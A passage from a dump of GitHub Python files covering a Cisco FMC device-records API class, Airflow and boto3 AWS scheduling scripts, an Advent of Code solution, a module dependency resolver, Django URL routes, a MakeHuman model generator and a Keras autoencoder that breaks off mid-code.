\"FTDv10\", \"FTDv20\", \"FTDv30\", \"FTDv50\", \"FTDv100\", \"Legacy\"]\n\n def __init__(self, fmc, **kwargs):\n \"\"\"\n Initialize DeviceRecords object.\n\n :param fmc (object): FMC object\n :param **kwargs: Any other values passed during instantiation.\n :return: None\n \"\"\"\n super().__init__(fmc, **kwargs)\n logging.debug(\"In __init__() for DeviceRecords class.\")\n self.parse_kwargs(**kwargs)\n\n def parse_kwargs(self, **kwargs):\n \"\"\"\n Parse the kwargs and set self variables to match.\n\n :return: None\n \"\"\"\n super().parse_kwargs(**kwargs)\n logging.debug(\"In parse_kwargs() for DeviceRecords class.\")\n if \"acp_name\" in kwargs:\n self.acp(name=kwargs[\"acp_name\"])\n\n def licensing(self, action, name=\"BASE\"):\n \"\"\"\n Associate licenses with this device record.\n\n :param action: (str) 'add', 'remove', 'clear'\n :param name: (str) Value from LICENSES constant.\n :return: None\n \"\"\"\n logging.debug(\"In licensing() for DeviceRecords class.\")\n if action == \"add\":\n if name in self.LICENSES:\n if \"license_caps\" in self.__dict__:\n self.license_caps.append(name)\n self.license_caps = list(set(self.license_caps))\n else:\n self.license_caps = [name]\n logging.info(f'License \"{name}\" added to this DeviceRecords object.')\n\n else:\n logging.warning(\n f\"{name} not found in {self.LICENSES}. Cannot add license to DeviceRecords.\"\n )\n elif action == \"remove\":\n if name in self.LICENSES:\n if \"license_caps\" in self.__dict__:\n try:\n self.license_caps.remove(name)\n except ValueError:\n logging.warning(\n f\"{name} is not assigned to this devicerecord thus cannot be removed.\"\n )\n logging.info(\n f'License \"{name}\" removed from this DeviceRecords object.'\n )\n else:\n logging.warning(\n f\"{name} is not assigned to this devicerecord thus cannot be removed.\"\n )\n\n else:\n logging.warning(\n f\"{name} not found in {self.LICENSES}. Cannot remove license from DeviceRecords.\"\n )\n elif action == \"clear\":\n if \"license_caps\" in self.__dict__:\n del self.license_caps\n logging.info(\"All licensing removed from this DeviceRecords object.\")\n\n def tiering(self, action, name=\"\"):\n \"\"\"\n Associate performance tier with this device record.\n\n :param action: (str) 'add', 'remove', 'clear'\n :param name: (str) Value from TIERS constant.\n :return: None\n \"\"\"\n logging.debug(\"In tiering() for DeviceRecords class.\")\n if self.fmc.serverVersion < \"7.0\":\n logging.warning(\n f\"FTD performance tier licenses are supported only in FMC version 7.0 and newer.\"\n )\n else:\n if action == \"add\":\n if name in self.TIERS:\n self.performanceTier = name\n logging.info(\n f'Performance tier \"{name}\" added to this DeviceRecords object.'\n )\n else:\n logging.warning(\n f\"{name} not found in {self.TIERS}. Cannot add performance tier to DeviceRecords.\"\n )\n elif action == \"remove\":\n if name in self.TIERS:\n if \"performanceTier\" in self.__dict__:\n try:\n self.performanceTier = \"\"\n except ValueError:\n logging.warning(\n f\"{name} performance tier cannot be removed.\"\n )\n logging.info(\n f'License \"{name}\" removed from this DeviceRecords object.'\n )\n else:\n logging.warning(\n f\"{name} is not assigned to this DeviceRecords thus cannot be removed.\"\n )\n\n else:\n logging.warning(\n f\"{name} not found in {self.TIERS}. 
Cannot remove performance tier from DeviceRecords.\"\n                    )\n            elif action == \"clear\":\n                if \"performanceTier\" in self.__dict__:\n                    del self.performanceTier\n                    logging.info(\n                        \"Performance tier removed from this DeviceRecords object.\"\n                    )\n\n    def acp(self, name=\"\"):\n        \"\"\"\n        Associate AccessPolicy with this device.\n\n        :param name: (str) Name of ACP.\n        :return: None\n        \"\"\"\n        logging.debug(\"In acp() for DeviceRecords class.\")\n        acp = AccessPolicies(fmc=self.fmc)\n        acp.get(name=name)\n        if \"id\" in acp.__dict__:\n            self.accessPolicy = {\"id\": acp.id, \"type\": acp.type}\n        else:\n            logging.warning(\n                f\"Access Control Policy {name} not found. Cannot set up accessPolicy for DeviceRecords.\"\n            )\n\n    def wait_for_task(self, task, wait_time=10):\n        \"\"\"\n        Pause configuration script and wait for device registration to complete.\n\n        :param task: (dict) task[\"id\": (str)]\n        :param wait_time: (int) Seconds to wait before rechecking.\n        :return: None\n        \"\"\"\n        task_completed_states = [\"Success\", \"SUCCESS\", \"COMPLETED\"]\n        try:\n            status = TaskStatuses(fmc=self.fmc, id=task[\"id\"])\n            current_status = status.get()\n            \"\"\"\n            Task Status for new device registration behaves differently than other tasks\n            On new device registration, a task is sent for the initial registration. After completion\n            the UUID is deleted without any change in task status. So we check to see if the object no longer exists\n            to assume the registration is complete. After registration, discovery of the device begins, but there is\n            no way to check for this with a task status. The device can't be modified during this time, but a new\n            device registration can begin.\n\n            OTOH, a device HA operation will update its status to \"Success\" on completion. Hence the two different\n            checks.\n            \"\"\"\n            while (\n                current_status[\"status\"] is not None\n                and current_status[\"status\"] not in task_completed_states\n            ):\n                # Lot of inconsistencies with the type of data a task can return\n                if \"taskType\" in current_status.keys():\n                    logging.info(\n                        f\"Task: {current_status['taskType']} {current_status['status']} {current_status['id']}\"\n                    )\n                    time.sleep(wait_time)\n                    current_status = status.get()\n                else:\n                    logging.info(\n                        f\"Task: {current_status['status']} {current_status['id']}\"\n                    )\n                    time.sleep(wait_time)\n                    current_status = status.get()\n            logging.info(f\"Task: {current_status['status']} {current_status['id']}\")\n        except Exception as e:\n            logging.info(\"%s %s\", type(e), e)  # lazy formatting; passing two bare args to logging.info raises a formatting error\n\n    def post(self, **kwargs):\n        \"\"\"POST to FMC API.\"\"\"\n        logging.debug(\"In post() for DeviceRecords class.\")\n        response = super().post(**kwargs)\n        # self.wait_for_task(task=response[\"metadata\"][\"task\"], wait_time=30) # Doesn't work yet.\n        if \"post_wait_time\" in kwargs:\n            self.post_wait_time = kwargs[\"post_wait_time\"]\n        else:\n            self.post_wait_time = 300\n        logging.info(\n            f\"DeviceRecords registration task submitted. 
\"\n f\"Waiting {self.post_wait_time} seconds for it to complete.\"\n )\n time.sleep(self.post_wait_time)\n return response\n","repo_name":"marksull/fmcapi","sub_path":"fmcapi/api_objects/device_services/devicerecords.py","file_name":"devicerecords.py","file_ext":"py","file_size_in_byte":9636,"program_lang":"python","lang":"en","doc_type":"code","stars":73,"dataset":"github-code","pt":"77"} +{"seq_id":"34420254805","text":"\"\"\"\nDAG #2: This DAG is a compilation and arrangement of tasks to copy data from files stored into an S3 bucket and\ninsert it into the Redshift staging tables.\n\"\"\"\nimport os\nimport logging\nfrom datetime import datetime, timedelta\nfrom airflow import DAG\nfrom airflow.operators.dummy_operator import DummyOperator\nfrom operators import (RenderToS3Operator)\n\nLOCAL_DIR='/Users/leandroarruda/Codes/UdacityCapstoneDEng/data/'\n\ndefault_args = {\n 'owner': 'Leo Arruda',\n 'start_date': datetime(2021, 1, 1),\n 'depends_on_past': False,\n 'email_on_failure': False,\n 'email_on_retry': False,\n 'retries': 3,\n 'retry_delay': timedelta(minutes=5)\n}\n\ndag = DAG('NYC_TLC_UPLOAD_FILES_DAG',\n default_args=default_args,\n description='Load Precipitation and Taxi Zones data to S3 for processing',\n schedule_interval='@monthly',\n catchup=False,\n tags=['Load', 'Dataset', 'S3'],\n )\n\ncontent_list = os.listdir(LOCAL_DIR)\ndir_list = filter(\n lambda x: os.path.isdir(\n os.path.join(LOCAL_DIR, x)), content_list)\n\nlogging.info('Uploading : {}'.format(dir_list))\n\nprint('Uploading : {}'.format(dir_list))\n\nstart_upload = DummyOperator(\n task_id='Upload_To_S3_Start', dag=dag)\n\nend_upload = DummyOperator(\n task_id='Upload_To_S3_Finalized', dag=dag)\n\nrender_to_s3 = RenderToS3Operator(\n task_id='Render_To_S3',\n dag=dag,\n local_output=False,\n migrate_output=True,\n local_output_data_path=LOCAL_DIR,\n s3_bucket_name_prefix='udacity-data-lake',\n data_folders=dir_list,\n input_data_path=LOCAL_DIR,\n aws_connection_id='aws_credentials',\n aws_default_region='us-east-2',\n)\n\nstart_upload >> render_to_s3 >> end_upload","repo_name":"LeoArruda/UdacityCapstoneDataEngineer","sub_path":"dags/taxi_ride_upload_files_dag.py","file_name":"taxi_ride_upload_files_dag.py","file_ext":"py","file_size_in_byte":1748,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"42401756431","text":"import json\n\nimport boto3\n\n\ndef main():\n client = boto3.client('events')\n\n with open('./stepfunctions_name.json', 'r') as f:\n names = json.load(f)\n\n client.put_rule(\n Name=names['cloudwatch_events_name'],\n ScheduleExpression='cron(0 3 * * ? 
*)',\n        State='ENABLED',\n    )\n\n    client.put_targets(\n        Rule=names['cloudwatch_events_name'],\n        Targets=[\n            {\n                'Id': names['cloudwatch_events_id'],\n                'Arn': 'arn:aws:states:ap-northeast-1:829044821271:stateMachine:preprocess_pipeline', \n                'RoleArn': 'arn:aws:iam::829044821271:role/service-role/AWS_Events_Invoke_Step_Functions_1710309540'\n            }\n        ]\n    )\n\n\nif __name__ == '__main__':\n    main()\n","repo_name":"opeco17/illust_app","sub_path":"ml_infra/pre_process/create_cloudwatch_events.py","file_name":"create_cloudwatch_events.py","file_ext":"py","file_size_in_byte":758,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"77"} +{"seq_id":"41991203314","text":"import math\n\nwith open('input.txt') as f:\n    data = f.read().strip().split('\\n')\n\ndata = [list(line) for line in data]\n\n# Unused in part 1 but used here!\ndef handle(char):\n    if char == '(':\n        return ')'\n    elif char == '{':\n        return '}'\n    elif char == '<':\n        return '>'\n    elif char == '[':\n        return ']'\n\ndef calc_score(list_chars):\n    score = 0\n    for char in list_chars:\n        score *= 5\n\n        if char == ')':\n            score += 1\n        elif char == ']':\n            score += 2\n        elif char == '}':\n            score += 3\n        elif char == '>':\n            score += 4\n\n    return score\n\ndef fix_incomplete(stack):\n    additional = []\n    for char in list(reversed(stack)):\n        if char != ' ':\n            additional.append(handle(char))\n    return additional\n\ndef get_middle(scores):\n    sorted_scores = sorted(scores)\n    return sorted_scores[math.trunc(len(scores) / 2)]\n\ndef solve(lines):  # use the argument instead of the global 'data' (and avoid shadowing the builtin 'input')\n    scores = []\n    for line in lines:\n        stack = []\n        error = False\n        for char in line:\n            if char == ')':\n                if stack[-1] == '(':\n                    stack.pop()\n                else:\n                    error = True\n                    break\n            elif char == '}':\n                if stack[-1] == '{':\n                    stack.pop()\n                else:\n                    error = True\n                    break\n            elif char == '>':\n                if stack[-1] == '<':\n                    stack.pop()\n                else:\n                    error = True\n                    break\n            elif char == ']':\n                if stack[-1] == '[':\n                    stack.pop()\n                else:\n                    error = True\n                    break\n            else:\n                stack.append(char)\n        if not error:\n            scores.append(calc_score(fix_incomplete(stack)))\n    return get_middle(scores)\n\nprint('answer', solve(data))\n","repo_name":"jdlawrence/adventofcode2021","sub_path":"day10/day10-2.py","file_name":"day10-2.py","file_ext":"py","file_size_in_byte":1968,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"30946036348","text":"import os.path\nimport sys\nimport site\nimport inspect\nimport types\nimport collections\n \n\nclass _DependencyResolver(object):\n    \"\"\"\n    Finds dependencies given a module object\n    \"\"\"\n    \n    def __init__(self):\n        self._modules = set()\n        self._packages = collections.OrderedDict() # need an ordered set when merging namespace directories\n        self._processed_modules = set()\n    \n    def add_dependencies(self, module):\n        \"\"\"\n        Adds a module and its dependencies to the list of dependencies\n        \"\"\"\n        # add the module as a dependency\n        self._add_dependency(module)\n        # recursively get the module's imports and add those as dependencies\n        imported_modules = _get_imported_modules(module)\n        #print (\"_get_imported_modules for {0}: {1}\".format(module.__name__, imported_modules))\n        for imported_module_name,imported_module in imported_modules.items():\n            if imported_module not in self._processed_modules:\n                #print (\"add_dependencies for {0} {1}\".format(imported_module.__name__, imported_module))\n                self.add_dependencies(imported_module)\n    \n    @property\n    def modules(self):\n        \"\"\"\n        Property to get the list of module dependencies\n        \"\"\"\n        return 
frozenset(self._modules)\n \n @property\n def packages(self):\n \"\"\"\n Property to get the list of package dependencies\n \"\"\"\n return tuple(self._packages.keys()) \n \n def _add_dependency(self, module):\n \"\"\"\n Adds a module to the list of dependencies\n \"\"\"\n package_name = _get_package_name(module)\n if package_name:\n # module is part of a package\n # get the top-level package\n top_package_name = module.__name__.split('.')[0]\n top_package = sys.modules[top_package_name]\n if \"__path__\" in top_package.__dict__:\n # for regular packages, there is one top-level directory\n # for namespace packages, there can be more than one.\n # they will be merged in the bundle\n for top_package_path in reversed(list(top_package.__path__)):\n top_package_path = os.path.abspath(top_package_path)\n self._add_package(top_package_path)\n elif hasattr(top_package, '__file__'):\n # package that is an individual python file with empty __path__\n #print (\"Adding package that is an individual file\", top_package)\n self._add_package(os.path.abspath(top_package.__file__))\n elif hasattr(module, '__file__'):\n # individual Python module\n module_path = os.path.abspath(module.__file__)\n self._add_module(module_path)\n \n self._processed_modules.add(module)\n\n def _add_package(self, path):\n #print (\"Adding external package\", path)\n self._packages[path] = None\n \n def _add_module(self, path):\n #print (\"Adding external module\", path)\n self._modules.add(path)\n\n#####################\n# Utility functions #\n#####################\n \ndef _get_package_name(module):\n \"\"\"\n Gets the package name given a module object\n \n Returns:\n str: If the module belongs to a package, the package name. \n if the module does not belong to a package, None or ''.\n \"\"\"\n try:\n # if __package__ is defined, use it\n package_name = module.__package__\n except AttributeError:\n package_name = None \n \n if package_name is None:\n # if __path__ is defined, the package name is the module name\n package_name = module.__name__\n if not hasattr(module, '__path__'):\n # if __path__ is not defined, the package name is the\n # string before the last \".\" of the fully-qualified module name\n package_name = package_name.rpartition('.')[0]\n \n return package_name\n \ndef _get_module_name(function):\n \"\"\"\n Gets the function's module name\n Resolves the __main__ module to an actual module name\n Returns:\n str: the function's module name\n \"\"\"\n module_name = function.__module__\n if module_name == '__main__':\n # get the main module object of the function\n main_module = inspect.getmodule(function)\n # get the module name from __file__ by getting the base name and removing the .py extension\n # e.g. 
test1.py => test1\n if hasattr(main_module, '__file__'):\n module_name = os.path.splitext(os.path.basename(main_module.__file__))[0]\n return module_name\n\n\ndef _get_imported_modules(module):\n \"\"\"\n Gets imported modules for a given module\n The following modules are excluded: \n * built-in modules\n * modules that have \"com.ibm.streamsx.topology\" in the path\n * other system modules whose paths start with sys.prefix or sys.exec_prefix \n that are not inside a site package\n Returns:\n a dictionary of module names => modules\n \"\"\"\n imported_modules = {}\n #print (\"vars({0}): {1}\".format(module.__name__, vars(module)))\n for alias, val in vars(module).items():\n vars_module = None\n # module type\n if isinstance(val, types.ModuleType):\n vars_module = val\n # has __module__ attr, find module\n elif hasattr(val, '__module__') \\\n and val.__module__ in sys.modules:\n vars_module = sys.modules[val.__module__]\n # if we found a module, determine if it should be included\n # in the list of dependencies\n if vars_module: \n if not _is_builtin_module(vars_module) and \\\n not _is_streamsx_module(vars_module) and \\\n not _is_system_module(vars_module):\n imported_modules[vars_module.__name__] = vars_module\n return imported_modules\n\ndef _is_builtin_module(module):\n return module.__name__ in sys.builtin_module_names and \\\n not hasattr(module, '__file__') and \\\n not hasattr(module, '__path__')\n\ndef _is_streamsx_module(module):\n if hasattr(module, '__name__'):\n return module.__name__.startswith('streamsx.topology')\n return False\n\ndef _inside_site_package(path):\n \"\"\"\n Returns:\n True if the given path is for a site package, False otherwise\n \"\"\"\n return 'site-packages' in path\n\ndef _is_system_modulex(module_path):\n return not _inside_site_package(module_path) and \\\n (module_path.startswith((sys.prefix, sys.exec_prefix)) or \\\n (hasattr(sys, 'real_prefix') and module_path.startswith(sys.real_prefix)))\n \ndef _is_system_module(module):\n if hasattr(module, '__file__'):\n # module or regular package\n return _is_system_modulex(module.__file__)\n elif hasattr(module, '__path__'):\n # namespace package. assume system package if any path evaluates to true\n for module_path in list(module.__path__):\n if _is_system_modulex(module_path):\n return True\n return False\n","repo_name":"cancilla/streamsx.topology","sub_path":"com.ibm.streamsx.topology/opt/python/packages/streamsx/topology/dependency.py","file_name":"dependency.py","file_ext":"py","file_size_in_byte":7100,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"77"} +{"seq_id":"28092949793","text":"from django.urls import path\nfrom . 
import views\n\n# app_name = 'library'\n\nurlpatterns = [\n    path('', views.index, name='index'),\n\n    path('books/', views.listBooks, name='books'),\n    path('book/<int:pk>', views.bookDetails, name='book-detail'),\n    path('book/add', views.BookCreate.as_view(), name='book-add'),\n    path('book/update/<int:pk>', views.BookUpdate.as_view(), name='book-update'),\n    path('book/delete/<int:pk>', views.BookDelete.as_view(), name='book-delete'),\n\n    path('authors/', views.listAuthors, name='authors'),\n    path('author/add', views.AuthorCreate.as_view(), name='author-add'),\n    path('author/update/<int:pk>', views.AuthorUpdate.as_view(), name='author-update'),\n    path('author/delete/<int:pk>', views.AuthorDelete.as_view(), name='author-delete'),\n\n]\n","repo_name":"puniami/RJLibrary","sub_path":"library/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":790,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"17514874532","text":"import random\nimport os\nimport shutil\nimport numpy as np\n\n# download shoes from http://www.makehumancommunity.org/clothes/dudoc_domsjeans1.html\n# download hair from http://www.makehumancommunity.org/clothes/mhair02.html\n# download top from http://www.makehumancommunity.org/clothes/ballet_costume.html\n# download bottom from http://www.makehumancommunity.org/clothes/m_trousers_01.html\n# put these files into folder named 'models'\n# generate_list: index, cloth texture, model folder name, model file name \n\n\ncloth_pic_Folder = 'cloth_pic/'\nperson_Folder = 'create_person/'\nperson_save_Folder = person_Folder + 'deepfashion_pair_models/'\nbasic_personID = 0\n\n\ndef readCSV2List(readCSV2List_filePath):\n    readCSV2List_file = None\n    try:\n        readCSV2List_file = open(readCSV2List_filePath, 'r', encoding=\"gbk\")\n        readCSV2List_context = readCSV2List_file.read()\n        readCSV2List_result = readCSV2List_context.split(\"\\n\")\n        readCSV2List_result_length = len(readCSV2List_result)\n        for readCSV2List_i in range(readCSV2List_result_length):\n            readCSV2List_result[readCSV2List_i] = readCSV2List_result[readCSV2List_i].split(\",\")\n        return readCSV2List_result\n    except Exception:\n        print(\"Load data has some problem\")\n    finally:\n        if readCSV2List_file is not None:  # only close the file if it was actually opened\n            readCSV2List_file.close()\n\ndef generateHuman(cloth_list, person_id, sex):\n    haveAcc = 0\n    # load acc\n    hair = open('modeleTxt/hair.txt', 'r').readlines()\n    shoe = open('modeleTxt/shoe.txt', 'r').readlines()\n    pifu = open('modeleTxt/skin.txt', 'r').readlines()\n\n    if not os.path.exists(person_save_Folder):\n        os.makedirs(person_save_Folder)\n\n    if sex > 0:\n        Gender1 = 1000000\n    else:\n        Gender1 = 0\n    # setting\n    Gender = '%.6f' % (Gender1 / 1000000)\n    Muscle = '%.6f' % (random.randint(0, 1000000) / 1000000)\n    African_1 = random.randint(0, 1000000)\n    African = '%.6f' % (African_1 / 1000000)\n    Asian_1 = random.randint(0, 1000000 - African_1)\n    Asian = '%.6f' % (Asian_1 / 1000000)\n    Caucasian = '%.6f' % ((1000000 - Asian_1 - African_1) / 1000000)\n    if Gender1 > 1000000 / 2:\n        m_height = random.gauss(170, 5.7) / 200\n        while m_height > 1:\n            m_height = random.gauss(170, 5.7) / 200\n        Height = '%.6f' % (m_height)\n    else:\n        m_height = random.gauss(160, 5.2) / 200\n        while m_height > 1:\n            m_height = random.gauss(160, 5.2) / 200\n        Height = '%.6f' % (m_height)\n    BreastSize = '%.6f' % (random.randint(0, 70) / 100)\n    Age = '%.6f' % (random.randint(20, 90) / 100)\n    BreastFirmness = '%.6f' % (random.randint(30, 100) / 100)\n    Weight = '%.6f' % (random.randint(0, 1000000) / 1000000)\n\n    file_name = 'B' + str(person_id)\n    # creating person file\n    f = open(person_save_Folder + 
file_name + \".mhm\", 'a')\n f.write('# Written by MakeHuman 1.1.1\\n')\n f.write('version v1.1.1\\n')\n f.write('tags ' + file_name + '\\n')\n f.write('camera 0.0 0.0 0.0 0.0 0.0 1.0\\n')\n f.write('modifier macrodetails-universal/Muscle ' + Muscle + '\\n')\n f.write('modifier macrodetails/African ' + African + '\\n')\n f.write('modifier macrodetails-proportions/BodyProportions 0.500000\\n')\n f.write('modifier macrodetails/Gender ' + Gender + '\\n')\n f.write('modifier macrodetails-height/Height ' + Height + '\\n')\n f.write('modifier breast/BreastSize ' + BreastSize + '\\n')\n f.write('modifier macrodetails/Age ' + Age + '\\n')\n f.write('modifier breast/BreastFirmness ' + BreastFirmness + '\\n')\n f.write('modifier macrodetails/Asian ' + Asian + '\\n')\n f.write('modifier macrodetails/Caucasian ' + Caucasian + '\\n')\n f.write('modifier macrodetails-universal/Weight ' + Weight + '\\n')\n f.write('skeleton cmu_mb.mhskel\\n')\n f.write('eyes HighPolyEyes 2c12f43b-1303-432c-b7ce-d78346baf2e6\\n')\n\n # adding clothes\n if Gender1 > 1000000 / 2:\n f.write(hair[random.randint(0, len(hair) - 1)])\n else:\n f.write(hair[random.randint(0, len(hair) - 1)])\n f.write(shoe[random.randint(0, len(shoe) - 1)])\n for i in range(0, len(cloth_list)):\n f.write(cloth_list[i]+'\\n')\n f.write('clothesHideFaces True\\n')\n f.write(pifu[random.randint(0, len(pifu) - 1)])\n f.write('material Braid01 eead6f99-d6c6-4f6b-b6c2-210459d7a62e braid01.mhmat\\n')\n f.write('material HighPolyEyes 2c12f43b-1303-432c-b7ce-d78346baf2e6 eyes/materials/brown.mhmat\\n')\n f.write('subdivide False\\n')\n\ndef createClothes(modelFolder,modelName, uuid, saveName, saveFolder, imgName):\n def create_mhclo(modelFolder,modelName, uuid, saveName, saveFolder):\n file = 'models/' + modelFolder + '/' + modelName + '.mhclo'\n savePath = saveFolder + '/' + modelFolder + '/'\n if not os.path.exists(savePath):\n os.makedirs(savePath)\n with open(file, \"r\", encoding=\"utf-8\") as f1, open(savePath + '' + saveName + \".mhclo\", \"a\",\n encoding=\"utf-8\") as f2:\n for line in f1:\n if 'uuid' in line:\n line = 'uuid ' + uuid + '\\n'\n if 'name' in line:\n line = 'name ' + str(saveName) + '\\n'\n if 'material' in line:\n line = 'material ' + str(saveName) + '.mhmat' + '\\n'\n f2.write(line)\n for filename in os.listdir('models/' + modelFolder + '/'):\n if 'mhclo' not in filename and 'mhmat' not in filename:\n shutil.copy('models/' + modelFolder + '/' + filename, savePath)\n\n def create_mhmat(modelFolder,modelName, uuid, saveName, saveFolder, imgName):\n file = 'models/' + modelFolder + '/' + modelName + '.mhmat'\n savePath = saveFolder + '/' + modelFolder + '/'\n if not os.path.exists(savePath):\n os.makedirs(savePath)\n with open(file, \"r\", encoding=\"utf-8\") as f1, open(savePath + saveName + \".mhmat\", \"a\",\n encoding=\"utf-8\") as f2:\n for line in f1:\n if 'name' in line:\n line = 'name ' + str(saveName) + '\\n'\n if 'diffuseTexture' in line:\n line = 'diffuseTexture ' + imgName + '\\n'\n f2.write(line)\n shutil.move(cloth_pic_Folder+imgName, savePath + imgName)\n\n create_mhclo(modelFolder,modelName, uuid, saveName, saveFolder)\n create_mhmat(modelFolder,modelName, uuid, saveName, saveFolder, imgName)\n\n\ndef create_pair_person():\n clothlist = readCSV2List('generate_list.csv')\n personID = basic_personID\n sex = 0\n for i in range(0, len(clothlist), 2):\n try:\n print(i)\n sex = (sex+1)%2\n pair_list = []\n for j in range (i,i+2):\n uuid = '20210919-0000-0000-0000-' + str(j).zfill(12)\n save_name = 
'create_'+str(j).zfill(7)\n                save_folder = person_Folder+str(personID)\n                if not os.path.exists(save_folder):\n                    os.makedirs(save_folder)\n                img_name = clothlist[j][1]\n                pair_list.append('clothes ' + save_name + ' ' + uuid)\n                createClothes(clothlist[j][2],clothlist[j][3], uuid, save_name, save_folder, img_name)\n            generateHuman(pair_list, personID, sex)\n            personID += 1\n        except Exception as e:  # a bare except would also swallow KeyboardInterrupt; report what failed\n            print(i, personID, e)\ncreate_pair_person()\n","repo_name":"VideoObjectSearch/RandPerson","sub_path":"generateCode/generate_human_by_img/create_human_by_img.py","file_name":"create_human_by_img.py","file_ext":"py","file_size_in_byte":7354,"program_lang":"python","lang":"en","doc_type":"code","stars":89,"dataset":"github-code","pt":"77"} +{"seq_id":"30545691718","text":"from typing import List, Tuple, Dict\n\nimport tensorflow as tf\n\nfrom libs.network.network import add_symmetric_autoencoder, add_dense, parse_shape\n\n\nclass Autoencoder(tf.keras.Model):\n    def __init__(\n            self, p_dropout: float = 0.1,\n            hidden_activation: str = \"relu\", out_activation: str = \"sigmoid\", layer_dims: List[int] = None,\n            use_bias: bool = True, code_dim_override: int = None\n    ):\n        \"\"\"\n        Create an autoencoder\n        :param p_dropout: dropout percentage\n        :param hidden_activation: activation function of the hidden layers\n        :param out_activation: activation function of the output layer\n        :param layer_dims: hidden layer dimensions from the input to the code, if None use a convolutional AE\n        :param use_bias: include the bias vector in the layers (e.g. DeepSVDD does not use it)\n        \"\"\"\n        super(Autoencoder, self).__init__()\n\n        # Model config\n        self.p_dropout = p_dropout\n        self.hidden_activation = hidden_activation\n        self.out_activation = out_activation\n        self.layer_dims = layer_dims\n        self.use_bias = use_bias\n        self.code_dim_override = code_dim_override\n\n        if (layer_dims is not None) and (code_dim_override is not None):\n            # Ok, it was a bad idea to enforce tuples\n            new_layer_dims = list(layer_dims)\n            new_layer_dims[-1] = code_dim_override\n            self.layer_dims = new_layer_dims\n\n        # Layers\n        self.m_enc = None\n        self.m_dec = None\n\n        # Activation extractors\n        self.m_enc_act = None\n        self.m_dec_act = None\n        self.m_dec_act_on_code = None\n        self.m_all_act = None\n\n    # -- Autoencoder Architectures --\n    # Conv AE based on https://blog.keras.io/building-autoencoders-in-keras.html\n    def _conv_encoder(self, input_shape) -> tf.keras.Model:\n        model = tf.keras.Sequential(name=\"encoder\")\n\n        model.add(tf.keras.layers.Conv2D(16, (3, 3), padding=\"same\", input_shape=input_shape[1:], use_bias=self.use_bias))\n        model.add(tf.keras.layers.MaxPooling2D((2, 2), padding=\"same\"))\n        model.add(tf.keras.layers.Activation(self.hidden_activation))\n        model.add(tf.keras.layers.SpatialDropout2D(self.p_dropout))\n\n        model.add(tf.keras.layers.Conv2D(8, (3, 3), padding=\"same\", use_bias=self.use_bias))\n        model.add(tf.keras.layers.MaxPooling2D((2, 2), padding=\"same\"))\n        model.add(tf.keras.layers.Activation(self.hidden_activation))\n        model.add(tf.keras.layers.SpatialDropout2D(self.p_dropout))\n\n        model.add(tf.keras.layers.Conv2D(8, (3, 3), padding=\"same\", 
input_shape=input_shape[1:], use_bias=self.use_bias))\n model.add(tf.keras.layers.Activation(self.hidden_activation))\n model.add(tf.keras.layers.UpSampling2D((2, 2)))\n model.add(tf.keras.layers.SpatialDropout2D(self.p_dropout))\n\n model.add(tf.keras.layers.Conv2D(8, (3, 3), padding=\"same\", use_bias=self.use_bias))\n model.add(tf.keras.layers.Activation(self.hidden_activation))\n model.add(tf.keras.layers.UpSampling2D((2, 2)))\n model.add(tf.keras.layers.SpatialDropout2D(self.p_dropout))\n\n if output_shape[1] == 32:\n model.add(tf.keras.layers.Conv2D(16, (3, 3), padding=\"same\", use_bias=self.use_bias))\n else:\n model.add(tf.keras.layers.Conv2D(16, (3, 3), use_bias=self.use_bias))\n model.add(tf.keras.layers.Activation(self.hidden_activation))\n model.add(tf.keras.layers.UpSampling2D((2, 2)))\n model.add(tf.keras.layers.SpatialDropout2D(self.p_dropout))\n\n model.add(tf.keras.layers.Conv2D(\n output_shape[-1], (3, 3), activation=self.out_activation, padding=\"same\", name=\"target_output\", use_bias=self.use_bias\n ))\n\n return model\n\n def _dense_encoder(self, input_shape):\n model = tf.keras.Sequential(name=\"encoder\")\n\n add_dense(\n model, layer_dims=self.layer_dims[:-1], p_dropout=self.p_dropout,\n activation=self.hidden_activation, input_shape=input_shape[1:], use_bias=self.use_bias\n )\n # We add the last layer manually to name it accordingly\n model.add(tf.keras.layers.Dense(\n self.layer_dims[-1], activation=self.hidden_activation, name=\"code\", use_bias=self.use_bias\n ))\n\n return model\n\n def _dense_decoder(self, input_shape, output_dim):\n model = tf.keras.Sequential(name=\"decoder\")\n\n add_dense(\n model, layer_dims=list(reversed(self.layer_dims[:-1])), p_dropout=self.p_dropout,\n activation=self.hidden_activation, input_shape=input_shape[1:], use_bias=self.use_bias\n )\n # The last layer reconstructs the input\n model.add(tf.keras.layers.Dense(\n output_dim[-1], activation=self.out_activation, use_bias=self.use_bias\n ))\n\n return model\n\n # == Keras functions ==\n def build(self, input_shape):\n # Based on the given layers, we use a dense or convolutional AE\n self.m_enc = self._conv_encoder(input_shape) if self.layer_dims is None \\\n else self._dense_encoder(input_shape)\n self.m_dec = self._conv_decoder(self.m_enc.output_shape, input_shape) if self.layer_dims is None \\\n else self._dense_decoder(self.m_enc.output_shape, input_shape)\n\n self.build_extractors()\n\n def compile(self, learning_rate=0.0001, loss=\"binary_crossentropy\", optimizer=None, **kwargs):\n new_optimizer = tf.keras.optimizers.Adam(learning_rate)\n return super(Autoencoder, self).compile(optimizer=new_optimizer, loss=loss, **kwargs)\n\n def fit(self, x=None, y=None, batch_size=None, epochs=60, verbose=2, **kwargs):\n return super(Autoencoder, self).fit(x=x, y=y, batch_size=batch_size, epochs=epochs, verbose=verbose, **kwargs)\n\n def build_extractors(self):\n # On top, we build the activation extractors\n t_enc_act = tf.keras.layers.Concatenate()([\n tf.keras.layers.Flatten()(cur_layer.output) for cur_layer in self.m_enc.layers\n if isinstance(cur_layer, tf.keras.layers.Activation) or isinstance(cur_layer, tf.keras.layers.LeakyReLU)\n ])\n t_dec_act = tf.keras.layers.Concatenate()([\n tf.keras.layers.Flatten()(cur_layer.output) for cur_layer in self.m_dec.layers\n if isinstance(cur_layer, tf.keras.layers.Activation) or isinstance(cur_layer, tf.keras.layers.LeakyReLU)\n ])\n # Activation extractors\n self.m_enc_act = tf.keras.Model(self.m_enc.inputs, t_enc_act, name=\"act_enc\")\n 
